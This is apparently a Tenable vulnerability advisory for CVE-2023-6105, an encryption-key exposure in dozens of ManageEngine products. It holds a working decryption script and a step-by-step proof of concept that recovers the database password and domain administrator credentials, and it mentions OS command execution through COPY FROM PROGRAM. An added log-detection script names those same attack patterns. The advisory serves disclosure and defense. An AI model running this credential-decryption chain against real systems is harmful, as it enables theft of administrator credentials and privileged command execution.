
ManageEngine Information Disclosure

Medium

Synopsis

An information disclosure vulnerability exists in multiple ManageEngine products that can result in encryption keys being exposed. A low-privileged OS user with access to the host where an affected ManageEngine product is installed can view and use the exposed key to decrypt product database passwords. This allows the user to access the ManageEngine product database.


An encryption key is stored in the "CryptTag" configuration in <PRODUCT_INSTALLATION_DIR>\conf\customer-config.xml. 

The ManageEngine product database usernames and passwords can be found in <PRODUCT_INSTALLATION_DIR>\conf\database_params.conf.


A database password can be decrypted with the following Python script (me_decrypt.py):

import sys
# Requires the pycryptodome package (Crypto.Util.Padding is not in the old pycrypto)
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Hash import SHA1
from Crypto.Util.Padding import unpad

# argv[1]: the encrypted value as a hex string (e.g. the password= entry in
#          database_params.conf)
# argv[2]: the key (the CryptTag value from customer-config.xml)
data = bytearray.fromhex(sys.argv[1])
pw = sys.argv[2]

# The first 20 bytes of the blob are the PBKDF2 salt; the rest is the ciphertext
salt = data[:20]
# PBKDF2-HMAC-SHA1, 65556 iterations, 32-byte key (AES-256)
key = PBKDF2(pw, salt, 32, 65556, None, SHA1)
# AES-256-CBC with an all-zero IV and PKCS#7 padding
cipher = AES.new(key, AES.MODE_CBC, iv=b'\x00'*16)
print(unpad(cipher.decrypt(data[20:]),16).decode())

'''
Usage:
me_decrypt.py <encrypted_data_in_hexstr> <key>
me_decrypt.py <password_in_database_params.conf> <CryptTag_in_customer-config.xml>

python3 me_decrypt.py 'd7910c7070b09da8598b35837122217739c728f09d05354e45f7ebbe3f027781b04d2a1c' 'rfMtKVF1cDxUc0DBov8x'
wkd4uzEHFs
'''


With access to the product database, an attacker can perform the following:

  • Run OS commands (e.g., via COPY ... FROM PROGRAM '<command>') with the privileges of the user account running the database server. This account is usually SYSTEM or some other administrative account.
  • Modify the database to reset the password of an administrative user for the product.
  • View data contents to reveal other sensitive information.
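Each of the actions listed above leaves a trace in the PostgreSQL server log once statement and connection logging are on, which gives defenders a detection point independent of the product. The script below is an added example, not code from the advisory or from Tenable or ManageEngine: it parses log lines and flags an interactive psql session on the product database, bulk decryption of the stored domain credentials (the query shape used in the proof of concept), and COPY ... FROM/TO PROGRAM. It assumes PostgreSQL's default log_line_prefix ('%m [%p] '), log_connections = on and log_statement = 'all', and that the server includes application_name in its "connection authorized" line (recent PostgreSQL versions do). The sample lines are constructed; '<KEY>' and '<command>' are placeholders.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set

# Constructed sample log (not from the advisory). Default log_line_prefix '%m [%p] '
# with log_connections = on and log_statement = 'all'. The database name, user and
# table name are the ones the advisory shows; the key and command are placeholders.
SAMPLE_LOG = """\
2023-11-15 10:01:02.123 UTC [4120] LOG:  connection authorized: user=admanager database=adsm application_name=PostgreSQL JDBC Driver
2023-11-15 10:01:03.000 UTC [4120] LOG:  statement: SELECT domain_name, user_name FROM ADSCredentials;
2023-11-15 10:05:10.456 UTC [4131] LOG:  connection authorized: user=admanager database=adsm application_name=psql
2023-11-15 10:05:20.789 UTC [4131] LOG:  statement: select domain_name, user_name, pgp_sym_decrypt(password,'<KEY>','cipher-algo=aes256') AS "password" from ADSCredentials;
2023-11-15 10:06:00.000 UTC [4131] LOG:  statement: COPY scratch FROM PROGRAM '<command>';
"""

# Parses the default prefix: timestamp with zone, [backend pid], LEVEL:  message
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \S+ \S+) \[(?P<pid>\d+)\] (?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)

# Detection rules: (severity, rule name, pattern applied to the message part).
RULES = [
    # OS command execution under the database server's own account.
    ("high", "os-command-via-copy",
     re.compile(r"\bCOPY\b.*\b(FROM|TO)\s+PROGRAM\b", re.I)),
    # An interactive psql session on a database that normally only the product's
    # JDBC pool opens.
    ("medium", "interactive-client",
     re.compile(r"connection authorized:.*\bapplication_name=psql\b", re.I)),
    # Bulk decryption of stored domain credentials (the PoC query shape). Tune or
    # drop this rule if the product itself legitimately issues such statements.
    ("medium", "bulk-credential-decrypt",
     re.compile(r"pgp_sym_decrypt\s*\(.*\bADSCredentials\b", re.I)),
]


class Finding(NamedTuple):
    severity: str
    rule: str
    pid: int
    timestamp: str
    message: str


def scan_log(text: str) -> List[Finding]:
    """Return one Finding per (line, matching rule); lines that do not parse are skipped."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        msg = m.group("msg")
        for severity, rule, pattern in RULES:
            if pattern.search(msg):
                findings.append(Finding(severity, rule, int(m.group("pid")), m.group("ts"), msg))
    return findings


def sessions_of_concern(findings: List[Finding]) -> Dict[int, Set[str]]:
    """Group rule hits by backend pid so a reviewer sees one session's whole story."""
    by_pid: Dict[int, Set[str]] = defaultdict(set)
    for f in findings:
        by_pid[f.pid].add(f.rule)
    return dict(by_pid)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"[{f.severity}] {f.timestamp} pid={f.pid} {f.rule}: {f.message}")
    for pid, rules in sessions_of_concern(hits).items():
        print(f"pid {pid}: {', '.join(sorted(rules))}")
```

Grouping by backend pid is what makes the result actionable: in the sample, the JDBC session (pid 4120) reads the credential table without triggering anything, while the psql session (pid 4131) accumulates all three rule hits and is the one to investigate.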

Proof of Concept:

To view domain administrative credentials in ADManager Plus build 7182:

# Verify a low-privileged domain user (duser1) is logged in
PS C:\Program Files\ManageEngine\ADManager Plus> whoami /user /groups

USER INFORMATION

User Name SID
========= ==============================================
dw\duser1 S-1-5-21-1667561354-2975149694-3384506032-1605

GROUP INFORMATION

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users               Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON      Well-known group S-1-5-14     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
PS C:\Program Files\ManageEngine\ADManager Plus>


# Get product database username and password (encrypted)
PS C:\Program Files\ManageEngine\ADManager Plus> Select-String "(username|password)=" .\conf\database_params.conf | select -ExpandProperty line
username=admanager
password=af7638bf753b03f6eaa449be8d030589217b21d3e6ddff8adabe22aed1eebcb11f9b3b40


# Get ECTag (encryption key for domain passwords) and CryptTag (encryption key for DB passwords)
PS C:\Program Files\ManageEngine\ADManager Plus> Select-String "(ECTag|CryptTag)" .\conf\customer-config.xml | select -ExpandProperty line
<configuration name="ECTag" value="4e2e52c9c79f1b26dbe59981ab967a9cf3dd21cac24ec3905214be3eac828f19205a53709cce42bd082c8e821128ad751051f668"/>
<configuration name="CryptTag" value="hYC1D8l2-DgXdVVYPIZN"/>

# Decrypt database password using CryptTag as key
python3 me_decrypt.py 'af7638bf753b03f6eaa449be8d030589217b21d3e6ddff8adabe22aed1eebcb11f9b3b40' 'hYC1D8l2-DgXdVVYPIZN'
4p4HvCJsRC


# Decrypt ECTag using CryptTag as key
python3 me_decrypt.py '4e2e52c9c79f1b26dbe59981ab967a9cf3dd21cac24ec3905214be3eac828f19205a53709cce42bd082c8e821128ad751051f668' 'hYC1D8l2-DgXdVVYPIZN'
uBXejNXJxqYn7WeL


# Login to the database using decrypted password
PS C:\Program Files\ManageEngine\ADManager Plus> $Env:PGPASSWORD="4p4HvCJsRC"
PS C:\Program Files\ManageEngine\ADManager Plus> .\pgsql\bin\psql.exe -h 127.0.0.1 -p 33306 -d adsm -U admanager -q
adsm=>


# Grab domain administrative credentials
# Domain passwords are decrypted using the decrypted ECTag as the key
adsm=> select domain_name, user_name, pgp_sym_decrypt(password,'uBXejNXJxqYn7WeL','cipher-algo=aes256') AS "password" from ADSCredentials;
 domain_name | user_name     | password
-------------+---------------+----------
 <REDACTED>  | administrator | <REDACTED>

Solution

Apply the appropriate vendor supplied patch.

Disclosure Timeline

March 27, 2023 - Tenable discloses to vendor
April 5, 2023 - Vendor acknowledges
May 11, 2023 - Tenable requests status update
May 25, 2023 - Vendor provides status update and requires disclosure deadline extension
May 29, 2023 - Tenable acknowledges request
May 30, 2023 - Tenable pushes disclosure deadline back 30 days
July 5, 2023 - Tenable requests status update
July 7, 2023 - Vendor provides status update and notes difficulties in patching due to number of affected products
July 10, 2023 - Tenable states that further extensions have been granted
July 27, 2023 - Tenable requests status update
August 4, 2023 - Vendor provides status update
September 5, 2023 - Tenable requests status update
September 5, 2023 - Vendor states that a status update has been requested from dev teams
September 25, 2023 - Vendor provides status update
November 9, 2023 - Tenable requests status update and more information regarding affected products
November 11, 2023 - Vendor acknowledges request
November 13, 2023 - Tenable reserves CVE and informs vendor of intent to publish
November 14, 2023 - Vendor provides full list of affected products and corresponding patches

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2023-6105
Tenable Advisory ID: TRA-2023-35
CVSSv3 Base / Temporal Score:
5.5 / 5.1
CVSSv3 Vector:
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Affected Products:
Service Desk Plus prior to version 14304
Asset Explorer prior to version 7004
Service Desk Plus MSP prior to version 14305
Support Center Plus prior to version 14304
Access Manager Plus prior to version 4310
PAM 360 prior to version 5700
Password Manager Pro prior to version 12300
OpManager prior to version 125632 on Windows and version 127243 on Linux
Firewall Analyser prior to version 125632 on Windows and version 127243 on Linux
Netflow Analyser prior to version 125632 on Windows and version 127243 on Linux
Network Configurations Manager prior to version 125632 on Windows and version 127243 on Linux
OpUtils prior to version 125632 on Windows and version 127243 on Linux
Creator On-Premise prior to version 2.0.0
Analytics Plus On-Premise prior to version 5300
ADSelfService Plus prior to version 6304
ADManager Plus prior to version 7210
ADAudit Plus prior to version 7251
Cloud Security Plus prior to version 4170
Data Security Plus prior to version 6126
Exchange Reporter Plus prior to version 5713
M365 Manager Plus prior to version 4539
M365 Security Plus prior to version 4539
SharePoint Manager Plus prior to version 4405
Recovery Manager Plus prior to version 6074
Log360 UEBA prior to version 4050
Endpoint Central prior to version 11.2.2322.01
Endpoint Central MSP prior to version 11.2.2322.01
Remote Monitoring and Management prior to version 10.2.11
Mobile Device Management prior to version 10.1.2204.2
Remote Access Plus prior to version 11.2.2328.01
OS Deployer prior to version 1.2.2331.1
Browser Security Plus prior to version 11.2.2328.01
Patch Manager Plus prior to version 11.2.2328.01
Vulnerability Manager Plus prior to version 11.2.2328.01
Application Control Plus prior to version 11.2.2328.01
Patch Connect Plus prior to version 90124
Device Control Plus prior to version 11.2.2328.01
Endpoint DLP Solution prior to version 11.2.2328.01
Secure Gateway Server prior to version 90091
Risk Factor:
Medium

Advisory Timeline

November 15, 2023 - Initial release